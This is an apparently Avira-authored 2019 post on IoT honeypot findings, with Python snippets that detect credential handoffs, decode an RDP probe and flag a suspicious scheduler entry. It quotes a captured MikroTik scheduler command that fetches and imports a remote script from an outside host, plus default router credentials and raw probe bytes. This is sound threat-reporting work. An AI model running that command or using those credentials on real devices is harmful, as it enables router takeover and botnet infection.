Tuesday, October 22, 2019

Avira honeypot uncovers hacker coordination and stand-alone strategies for attacking your smart devices

Tettnang, Germany, October 22, 2019 - How can an attacker in Country A find and attack a device in Country B? The answer is multi-layered. Attackers frequently use IP/port scanning scripts to find open ports on a device; each open port is linked to a corresponding service that communicates over it.

Essentially, the attackers are launching an automated search for open doors and windows. The IP/port scanner itself can be very basic and simple to write at the entry level, or more complex depending on the attacker's skill or objectives.

It takes just minutes for an attacker to find a connected device with open ports. The Avira IoT honeypot, with profiles of smart TVs, routers and IP cameras, was attacked within five minutes of going live. In just 30 minutes, it had experienced a range of attacks directed at Telnet and SSH services and at any device running Android.

Sharing is caring

These scanning scripts may appear to come from autonomous botnets, each probing independently for open ports or vulnerable services, but that is not always the case. Some attacking botnets are interconnected, sharing code and information about potentially infected hosts behind the scenes. This automated data exchange begins within minutes of a script spotting an open port, and other botnets then start their assault. Shown below is a sequence of related attacks:

| Attack no. | Date | Port | IP | Duration | Username | Password | Description |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 17357 | Wed, 18 Sep 2019 10:48:44 (UTC) | 22 (Telnet) | 79.36.*.* | 3.827 sec | root | zlxx. | Gathers information. Does not do anything malicious. |
| 17372 | Wed, 18 Sep 2019 10:48:49 (UTC) | 22 (Telnet) | 178.128.*.* | 87.575 sec | root | zlxx. | The real attack. Downloads malware and infects the device. |

On Wed, 18 Sep 2019 at 10:48:44 (UTC), someone from Italy (more accurately, a script) successfully logged into the honeypot with the username/password combination "root" and "zlxx.". This information was immediately shared with others. Five seconds later, someone from Singapore logged in with the same credentials and infected the device.

This data sharing and attack coordination shows that attackers have established a basic division of labor and inter-bot communication. The first attack phase is to discover vulnerable devices and find a way in. The second phase is the actual device infection and gaining persistence.
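The handoff pattern in the table above can be picked out of honeypot logs automatically. The following is an added example, not Avira's code: it groups sessions by credential pair and reports a short, non-malicious login that is followed within a time window by a payload-delivering login using the same credentials from a different source IP. The records are constructed from the table; the page masks the source IPs, so the final octets are placeholders.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records modelled on the honeypot table above (not a real log export).
# The page masks the source IPs; the final octets here are placeholders.
SAMPLE_LOG = [
    {"id": 17357, "ts": "2019-09-18 10:48:44", "port": 22, "ip": "79.36.0.1",
     "user": "root", "password": "zlxx.", "payload": False},    # recon only
    {"id": 17372, "ts": "2019-09-18 10:48:49", "port": 22, "ip": "178.128.0.1",
     "user": "root", "password": "zlxx.", "payload": True},     # downloads malware
    {"id": 17501, "ts": "2019-09-18 11:32:59", "port": 23, "ip": "185.234.0.1",
     "user": "Root", "password": "nosoup4u", "payload": True},  # stand-alone attack
]

def _ts(record):
    return datetime.strptime(record["ts"], "%Y-%m-%d %H:%M:%S")

def find_handoffs(records, window=timedelta(seconds=60)):
    """Return (recon_id, attack_id, gap_seconds) tuples.

    A handoff is a login that does nothing malicious, followed within `window`
    by a login with the same username/password from a *different* source IP
    that does deliver a payload. A single brute-forcer reusing its own
    credentials from one address is deliberately not reported."""
    by_cred = defaultdict(list)
    for r in records:
        by_cred[(r["user"], r["password"])].append(r)
    handoffs = []
    for sessions in by_cred.values():
        sessions.sort(key=_ts)
        for i, recon in enumerate(sessions):
            if recon["payload"]:
                continue
            for later in sessions[i + 1:]:
                gap = _ts(later) - _ts(recon)
                if gap > window:
                    break  # sorted by time, so nothing later can qualify
                if later["ip"] != recon["ip"] and later["payload"]:
                    handoffs.append((recon["id"], later["id"], gap.total_seconds()))
    return handoffs

if __name__ == "__main__":
    for recon_id, attack_id, gap in find_handoffs(SAMPLE_LOG):
        print(f"credential handoff: #{recon_id} -> #{attack_id} after {gap:.0f}s")
```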

Blind Shooting - Brute-force attacks:

Sharing data is the exception at the moment. Sometimes an entire attack is conducted in one session. This is essentially a brute-force shotgun attack in the dark: all devices are targeted, the exposed and vulnerable ones take the damage, and the rest survive. Below are three actual examples of brute-force attacks.

Episode one:

We observed an attack on Wed, 18 Sep 2019 11:32:59 (UTC) from Ireland:

| Attack no. | Date | Port | IP | Duration | Username | Password | Description |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 17501 | Wed, 18 Sep 2019 11:32:59 (UTC) | 23 (SSH) | 185.234.*.* | 38.482 sec | Root | nosoup4u | Downloads malware and infects the device. |

If we look at the prior and subsequent connections to the honeypot, we see that this attack came out of the blue. Someone just logged in, infected the system, and left.

| Attack no. | Date | Port | IP | Duration | Username | Password | Description |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 7193 | Tue, 17 Sep 2019 15:47:29 (UTC) | 23 (SSH) | 185.234.*.* | 38.117 sec | Root | nosoup4u | Downloads malware and infects the device. |

The attacker appears to have selected its victims randomly or sequentially and attacked them without even changing the username/password combination. Analysis of the credentials used reveals that these are the default credentials for DreamPlug routers. While every router gets the attack, it only hurts DreamPlug routers.

Episode two:

Attackers are also mixing ports and services in the blind hope of finding a vulnerable target. The honeypot caught an incoming attack on port 5555, the default port for ADB. However, the attack itself did not comply with the ADB protocol. Researchers dumped the attack vector to find out more:

    0000  03 00 00 2F 2A E0 00 00  00 00 00 43 6F 6F 6B 69  .../*......Cooki
    0010  65 3A 20 6D 73 74 73 68  61 73 68 3D 41 64 6D 69  e: mstshash=Admi
    0020  6E 69 73 74 72 0D 0A 01  00 08 00 01 00 00 00     nistr..........

Their detective work revealed that this was an attack targeting RDP (Remote Desktop Protocol), of a kind that usually originates from Russia. However, the attack vector had nothing to do with ADB (Android Debug Bridge). The attackers simply saw an open port and sent a blind attack targeting RDP in the hope of finding an RDP server on the other end.
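The dump above is a complete RDP connection request: a TPKT frame (version 3, length 0x2F = 47) carrying an X.224 Connection Request (code 0xE0) whose payload is the `mstshash` routing cookie plus an RDP negotiation request. As an added example, not part of the original post, the parser below decodes exactly those bytes and flags the service mismatch a honeypot or IDS would want to surface: an RDP handshake arriving on a port that is not 3389.

```python
import re
import struct

# The 47-byte probe seen on port 5555, transcribed from the hex dump above.
CAPTURED_PROBE = bytes.fromhex(
    "0300002F2AE00000000000436F6F6B69"
    "653A206D737473686173683D41646D69"
    "6E697374720D0A0100080001000000"
)

def parse_rdp_connection_request(data):
    """Parse a TPKT (RFC 1006) frame carrying an X.224 Connection Request as
    used by RDP (MS-RDPBCGR). Returns a dict, or None when the bytes are not
    such a request."""
    # TPKT header: version 3, reserved 0, 16-bit big-endian total length.
    if len(data) < 11 or data[0] != 0x03 or data[1] != 0x00:
        return None
    tpkt_len = struct.unpack(">H", data[2:4])[0]
    if tpkt_len != len(data):
        return None
    # X.224 header: LI, code 0xE0 (Connection Request), DST-REF, SRC-REF, class.
    if data[4] != len(data) - 5 or data[5] != 0xE0:
        return None
    body = data[11:]
    # Optional routing cookie; mstshash carries the client's login name.
    m = re.match(rb"Cookie: mstshash=([^\r\n]*)\r\n", body)
    cookie = m.group(1).decode("ascii", "replace") if m else None
    rest = body[m.end():] if m else body
    # Optional RDP_NEG_REQ: type 0x01, flags, length 8, requestedProtocols (LE).
    protocols = None
    if len(rest) >= 8 and rest[0] == 0x01 and struct.unpack("<H", rest[2:4])[0] == 8:
        protocols = struct.unpack("<I", rest[4:8])[0]
    return {"tpkt_length": tpkt_len, "cookie": cookie, "requested_protocols": protocols}

def is_rdp_on_unexpected_port(data, port):
    """True when an RDP handshake arrives on a port other than RDP's 3389:
    the blind-probe signature from episode two."""
    return port != 3389 and parse_rdp_connection_request(data) is not None

if __name__ == "__main__":
    print(parse_rdp_connection_request(CAPTURED_PROBE))
    print("RDP probe on ADB port:", is_rdp_on_unexpected_port(CAPTURED_PROBE, 5555))
```

For the captured bytes the cookie decodes to `Administr` (the mstshash field truncates the login name) and requestedProtocols is 1, the TLS security option.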

Episode three:

Similar to episode two, the honeypot caught another attack on SSH, a service used almost everywhere: on huge mainframes, servers, enterprise networks, routers, IP cameras, and smartphones.

/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write

That is a malicious MikroTik script which only targets MikroTik devices and has no effect on devices from other manufacturers. Again, a shotgun-type approach which can only work a fraction of the time.
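For a RouterOS administrator auditing `/system scheduler` entries, the traits worth surfacing in that line are the fetch-then-import chain, the plain-HTTP download source and the broad policy list. Here is an added example (neither Avira's nor MikroTik's code) that splits the captured command into its arguments and reports those traits; the line is copied from the text above, and the benign entry in the test is constructed.

```python
import re

# The scheduler line the honeypot captured, copied from the text above.
CAPTURED_LINE = (
    '/system scheduler add name="U6" interval=10m on-event="/tool fetch '
    'url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http '
    'dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" '
    'policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,'
    'telnet,test,web,winbox,write'
)

# key=value pairs; a value is either a double-quoted string (with backslash
# escapes, so the quoted on-event script is kept whole) or a run of non-spaces.
ARG_RE = re.compile(r'(\w[\w-]*)=("(?:[^"\\]|\\.)*"|\S+)')
PRIVILEGED = {"sensitive", "password", "policy", "write", "reboot"}

def parse_scheduler_add(line):
    """Return the arguments of a `/system scheduler add ...` line, or None."""
    prefix = "/system scheduler add "
    if not line.startswith(prefix):
        return None
    args = {}
    for key, val in ARG_RE.findall(line[len(prefix):]):
        args[key] = val[1:-1] if val.startswith('"') else val
    return args

def assess_scheduler_entry(line):
    """Describe why an entry deserves a closer look (empty reasons = nothing flagged)."""
    args = parse_scheduler_add(line)
    if args is None:
        return None
    event = args.get("on-event", "")
    urls = re.findall(r"url=(\S+)", event)
    reasons = []
    if "/tool fetch" in event and "/import" in event:
        reasons.append("fetches a remote .rsc script and imports it")
    if any(u.startswith("http://") for u in urls):
        reasons.append("downloads over unauthenticated plain HTTP")
    granted = set(args.get("policy", "").split(",")) & PRIVILEGED
    if granted:
        reasons.append("runs with privileged policies: " + ",".join(sorted(granted)))
    return {"name": args.get("name"), "interval": args.get("interval"),
            "urls": urls, "reasons": reasons}

if __name__ == "__main__":
    print(assess_scheduler_entry(CAPTURED_LINE))
```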

Attackers are looking, sharing, and acting

Attackers find your device because they are always looking for open ports and vulnerable devices. Every minute, the Avira honeypot collects almost ten attacks, an average of 14,125 attacks each day on just one individual device. An open port is an invitation that will not be refused.

Sharing is increasingly going to be the name of the game. Attackers have learned how to share data about your devices and this will raise the risks for. Armed with information on open ports, attackers will strike, either through a more subtle coordinated approach or a brute-force attack. This attack strategy is indirectly supported by device manufacturers not building security into product design, with blank and weak default passwords and poor device installation processes.

Block attackers at the doorway with Avira

The lack of smart device security is systemic. A substantial number of smart devices have not been built with security in mind. It’s also not possible for the average user to make many of the needed security changes.

This is why Avira has developed SafeThings™ -- comprehensive protection for all internet connected devices in the home. For more information on Avira insights into smart device security and on how Avira SafeThings helps ISPs and router manufacturers protect their customers, please contact us at #MWC19 Los Angeles - South Hall #2540.